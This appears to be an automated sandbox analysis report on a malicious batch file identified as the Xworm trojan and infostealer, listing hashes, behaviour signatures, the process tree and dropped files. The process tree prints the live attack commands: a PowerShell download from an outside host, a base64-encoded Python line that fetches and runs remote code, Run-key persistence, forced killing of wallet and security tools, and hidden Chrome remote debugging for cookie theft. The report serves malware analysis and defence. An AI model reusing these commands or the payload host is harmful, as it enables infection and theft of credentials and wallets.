Analysis

  • max time kernel
    149s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/10/2024, 23:37

General

  • Target

    1[1].bat

  • Size

    158KB

  • MD5

    fe40ee4255d4757724cfca0bc65c2384

  • SHA1

    d012699b807eb5b32909ffdc365897ecc2b46c15

  • SHA256

    2f4252bb9695dd309f064d40d3fa45a122e6a44b3c442bff8d1ee1cd0a27c0fc

  • SHA512

    b58e09d1052c5d2e636329bb31337b2addd14971fd2322b382489af238dd536118490f1e4cdd461b68d666a7b0837404014970c6b2245a1f805074b203111dc7

  • SSDEEP

    3072:itkxMyL+YnNk57n2+d1zyPpwIjbrnHM7kZQ0u/swy/W:igJKKNk57fdB4pwIjbKkeGW

Malware Config

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 38 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1[1].bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\system32\chcp.com
      chcp 65001
      2⤵
        PID:1376
      • C:\Windows\system32\mshta.exe
        mshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\1_1_~1.BAT"" ::",0)(window.close)
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3580
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1_1_~1.BAT" ::"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3964
          • C:\Windows\system32\chcp.com
            chcp 65001
            4⤵
              PID:756
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'x1FWfQj3f9.zip') "
              4⤵
                PID:3420
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                4⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3152
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'x1FWfQj3f9'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'x1FWfQj3f9.zip'), $dst) "
                4⤵
                  PID:3292
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2388
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9YLU1ldGEvWC1NZXRhJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\x1FWfQj3f9\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
                  4⤵
                    PID:5096
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5004
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\WindowsSecurity.lnk' -Force "
                    4⤵
                      PID:1524
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      4⤵
                      • Adds Run key to start application
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4604
                    • C:\Windows\system32\cmd.exe
                      cmd.exe /c start "" "C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9YLU1ldGEvWC1NZXRhJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2276
                      • C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe
                        "C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9YLU1ldGEvWC1NZXRhJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:1248
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM "Atomic Wallet.exe"
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4392
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM bytecoin-gui.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2092
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM Coinomi.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4604
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM ArmoryQt.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:760
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM Element.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4444
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM Exodus.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3228
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM Guarda.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4364
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM KeePassXC.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2936
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM NordVPN.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2352
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM OpenVPNConnect.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:212
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM seamonkey.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4568
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM Signal.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1696
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM filezilla.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3176
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM filezilla-server-gui.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1236
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM keepassxc-proxy.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4548
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM steam.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1728
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM nordvpn-service.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1480
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM walletd.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1836
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM waterfox.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2784
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM Discord.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:692
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM DiscordCanary.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2124
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM burp.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4900
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM Ethereal.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:2632
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM EtherApe.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1052
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM fiddler.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4948
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM HTTPDebuggerSvc.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2376
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM HTTPDebuggerUI.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1304
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM snpa.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2228
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM solarwinds.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4500
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM tcpdump.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:916
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM telerik.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3344
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM wireshark.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:968
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM winpcap.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3152
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM telegram.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2364
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM chrome.exe
                          6⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4320
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                          6⤵
                          • Uses browser remote debugging
                          • Enumerates system info in registry
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of FindShellTrayWindow
                          PID:3324
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc9e13cc40,0x7ffc9e13cc4c,0x7ffc9e13cc58
                            7⤵
                              PID:2476
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1904,i,3439985268954294933,7082980461921314925,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2
                              7⤵
                                PID:2652
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1940,i,3439985268954294933,7082980461921314925,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:3
                                7⤵
                                  PID:4120
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=1668,i,3439985268954294933,7082980461921314925,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:8
                                  7⤵
                                    PID:5052
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2864,i,3439985268954294933,7082980461921314925,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2880 /prefetch:1
                                    7⤵
                                    • Uses browser remote debugging
                                    PID:3260
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2884,i,3439985268954294933,7082980461921314925,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2856 /prefetch:1
                                    7⤵
                                    • Uses browser remote debugging
                                    PID:1052
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4008,i,3439985268954294933,7082980461921314925,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1
                                    7⤵
                                    • Uses browser remote debugging
                                    PID:1224
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=4064,i,3439985268954294933,7082980461921314925,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:8
                                    7⤵
                                      PID:3856
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=4116,i,3439985268954294933,7082980461921314925,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4104 /prefetch:8
                                      7⤵
                                        PID:2328
                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                            1⤵
                              PID:1948

                            Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                    Filesize

                                    2B

                                    MD5

                                    d751713988987e9331980363e24189ce

                                    SHA1

                                    97d170e1550eee4afc0af065b78cda302a97674c

                                    SHA256

                                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                    SHA512

                                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                    Filesize

                                    3KB

                                    MD5

                                    3f01549ee3e4c18244797530b588dad9

                                    SHA1

                                    3e87863fc06995fe4b741357c68931221d6cc0b9

                                    SHA256

                                    36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

                                    SHA512

                                    73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Filesize

                                    53KB

                                    MD5

                                    a26df49623eff12a70a93f649776dab7

                                    SHA1

                                    efb53bd0df3ac34bd119adf8788127ad57e53803

                                    SHA256

                                    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                    SHA512

                                    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                    Filesize

                                    2KB

                                    MD5

                                    e4de99c1795fd54aa87da05fa39c199c

                                    SHA1

                                    dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

                                    SHA256

                                    23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

                                    SHA512

                                    796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                    Filesize

                                    3KB

                                    MD5

                                    7a636e64e7c35cce8bb49c6b481e9d26

                                    SHA1

                                    fca96424cea5ce008f637f41a317a949eff09765

                                    SHA256

                                    e01a32b7859cd9202e3f88ad9ac844799a832339b2acab24bccf8957e25dfe2f

                                    SHA512

                                    0a3fed4f81a7fbfe0458aeb65924911254c20904369a285a7b21cc13edd6b111e100b86273be0bc9e8cc4f4afd1a66c3a89235b0df0abc0f22be7e827bdc85c7

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                    Filesize

                                    2KB

                                    MD5

                                    b237669a0c184873a62411587c2fbbdf

                                    SHA1

                                    d897242cf33221efd895b32d11e54a4135583597

                                    SHA256

                                    e6070de7eadd85384c34c6fb189c35986b96e43ae720b62a9db4f93d5a4075e0

                                    SHA512

                                    4ee56774c565df0229b2c4d16fab853e6ea53d6aa9909f99a2d0e1112a46e7bcad03842fa983bf8fea750cc38f0c8366a4a0c8eca841216bd896b8ff13183bc3

                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgqq1s4k.xhx.ps1

                                    Filesize

                                    60B

                                    MD5

                                    d17fe0a3f47be24a6453e9ef58c94641

                                    SHA1

                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                    SHA256

                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                    SHA512

                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                  • C:\Users\Admin\AppData\Local\Temp\autofill_db

                                    Filesize

                                    114KB

                                    MD5

                                    a1eeb9d95adbb08fa316226b55e4f278

                                    SHA1

                                    b36e8529ac3f2907750b4fea7037b147fe1061a6

                                    SHA256

                                    2281f98b872ab5ad2d83a055f3802cbac4839f96584d27ea1fc3060428760ba7

                                    SHA512

                                    f26de5333cf4eaa19deb836db18a4303a8897bf88bf98bb78c6a6800badbaa7ab6aeb6444bbbe0e972a5332670bdbb474565da351f3b912449917be21af0afb8

                                  • C:\Users\Admin\AppData\Local\Temp\autofill_db

                                    Filesize

                                    116KB

                                    MD5

                                    f70aa3fa04f0536280f872ad17973c3d

                                    SHA1

                                    50a7b889329a92de1b272d0ecf5fce87395d3123

                                    SHA256

                                    8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                    SHA512

                                    30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                  • C:\Users\Admin\AppData\Local\Temp\x1FWfQj3f9.zip

                                    Filesize

                                    16.9MB

                                    MD5

                                    9c645b1011a1ca4868b00708fb8530c6

                                    SHA1

                                    bc48cc7f83b6588178796fa3922b6ded0af8b1c2

                                    SHA256

                                    b9e43e501ca30487cf556b8bfe5ea644cd130d1f5cce8f7fbeb4a68eef976d99

                                    SHA512

                                    3ede798b75a6fe6fdd017e5514ee6193409cc27b1b6c42be46e8d74fa5c4b97f55b90927ae66c4266bcf2f7c115310d0e01e1ba2e2cd595cd363556200e1d80d

                                  • C:\Users\Admin\AppData\Local\x1FWfQj3f9\DLLs\_hashlib.pyd

                                    Filesize

                                    48KB

                                    MD5

                                    2ac2dee9fdb32be30fefd4fdb5d280b3

                                    SHA1

                                    5e803c5d649521cab34bfc7ef6dc44954915220d

                                    SHA256

                                    f10c90062eaa68f41b1a6b34f3796e3ab8e0d765e595236e893cff9fad30116a

                                    SHA512

                                    86a7dfe6f15fce67accbc84262c73d25f2e440b7529143235b9b32f15f7804f99206e24c5ed8e5219bb5895bf6e397304ba153e064ff97eed23f5e92469e901e

                                  • C:\Users\Admin\AppData\Local\x1FWfQj3f9\DLLs\libcrypto-1_1.dll

                                    Filesize

                                    2.2MB

                                    MD5

                                    4633d62f19c0b25318b1c612995f5c21

                                    SHA1

                                    50601f9e2b07d616fde8ee387ce8cdcb0ca451df

                                    SHA256

                                    47376d247ae6033bc30fee4e52043d3762c1c0c177e3ec27ca46eff4b95c69b0

                                    SHA512

                                    d6a18e43b1a20242f80265054ed8d33598439ffa5df4920931ff43ec91f1ac2d8a3931913fd5569f48c9b1b9ea845d9e017ea23571a1ac1b352502a3e823eca9

                                  • C:\Users\Admin\AppData\Local\x1FWfQj3f9\Lib\site-packages\pyasn1\codec\der\__init__.py

                                    Filesize

                                    59B

                                    MD5

                                    0fc1b4d3e705f5c110975b1b90d43670

                                    SHA1

                                    14a9b683b19e8d7d9cb25262cdefcb72109b5569

                                    SHA256

                                    1040e52584b5ef6107dfd19489d37ff056e435c598f4e555f1edf4015e7ca67d

                                    SHA512

                                    8a147c06c8b0a960c9a3fa6da3b30a3b18d3612af9c663ee24c8d2066f45419a2ff4aa3a636606232eca12d7faef3da0cbbd3670a2d72a3281544e1c0b8edf81

                                  • C:\Users\Admin\AppData\Local\x1FWfQj3f9\Lib\site-packages\win32comext\axscript\__init__.py

                                    Filesize

                                    135B

                                    MD5

                                    f45c606ffc55fd2f41f42012d917bce9

                                    SHA1

                                    ca93419cc53fb4efef251483abe766da4b8e2dfd

                                    SHA256

                                    f0bb50af1caea5b284bd463e5938229e7d22cc610b2d767ee1778e92a85849b4

                                    SHA512

                                    ba7bebe62a6c2216e68e2d484c098662ba3d5217b39a3156b30e776d2bb3cf5d4f31dcdc48a2eb99bc5d80fffe388b212ec707b7d10b48df601430a07608fd46

                                  • C:\Users\Admin\AppData\Local\x1FWfQj3f9\Lib\site-packages\win32comext\taskscheduler\__init__.py

                                    Filesize

                                    192B

                                    MD5

                                    3d90a8bdf51de0d7fae66fc1389e2b45

                                    SHA1

                                    b1d30b405f4f6fce37727c9ec19590b42de172ee

